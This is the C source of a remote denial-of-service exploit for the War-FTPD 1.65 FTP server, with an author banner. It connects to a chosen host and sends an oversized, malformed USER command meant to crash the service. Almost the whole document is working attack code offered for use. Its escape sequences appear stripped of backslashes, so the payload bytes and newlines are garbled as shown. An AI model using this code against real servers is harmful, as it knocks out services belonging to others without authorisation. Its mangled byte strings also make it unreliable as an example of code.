War-FTPD version 1.65 remote denial of service exploit.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
void intro();
void main_exploit(char *ip, int port);
int main(int argc, char *argv[]) {
if (argc != 3) {
printf("Usage: %s <ip> <port>n", argv[0]);
exit(EXIT_FAILURE);
}
intro();
main_exploit(argv[1], atoi(argv[2]));
return 0;
}
void intro() {
printf("n"
"---------- # ------------------------------------------------------------------n"
"--------- ##= ------- [+] War-FTPD 1.65 Username - Denied of Service (DoS) -----n"
"-------- ##=== ----------------------------------------------------------------n"
"------ ###==#=== --------------------------------------------------------------n"
"---- ####===##==== ------------------------------------------------------------n"
"-- #####====###===== ----- Coded by Fernando Mengali -----n"
"- #####=====####===== ----- [email protected] -----n"
"- #####=====####===== --------------------------------------------------------n"
"--- ####= # #==== -------- Prepare to exploiting the server ------------n"
"--------- ##= ------------------------------------------------------------------n"
"------- ####=== ---------------------------------------------------------------n");
}
void main_exploit(char *ip, int port) {
char exploit[1000];
strcpy(exploit, "x41x41x41x41x41x41x41x41"); // Add more 'A's if needed
strcat(exploit, "x00x7ex2bx26x3dx25x3ax22x0ax0dx20x2fx5cx2ern");
int sockfd;
struct sockaddr_in server_addr;
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("Socket creation error");
exit(EXIT_FAILURE);
}
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(port);
if (inet_pton(AF_INET, ip, &server_addr.sin_addr) <= 0) {
perror("Invalid address/ Address not supported");
exit(EXIT_FAILURE);
}
if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
perror("Connection Failed");
exit(EXIT_FAILURE);
}
char buffer[1024] = {0};
read(sockfd, buffer, sizeof(buffer));
printf("Connected => %sn", buffer);
write(sockfd, "USER ", strlen("USER "));
write(sockfd, exploit, strlen(exploit));
read(sockfd, buffer, sizeof(buffer));
printf("Authentication USER: %sn", buffer);
close(sockfd);
}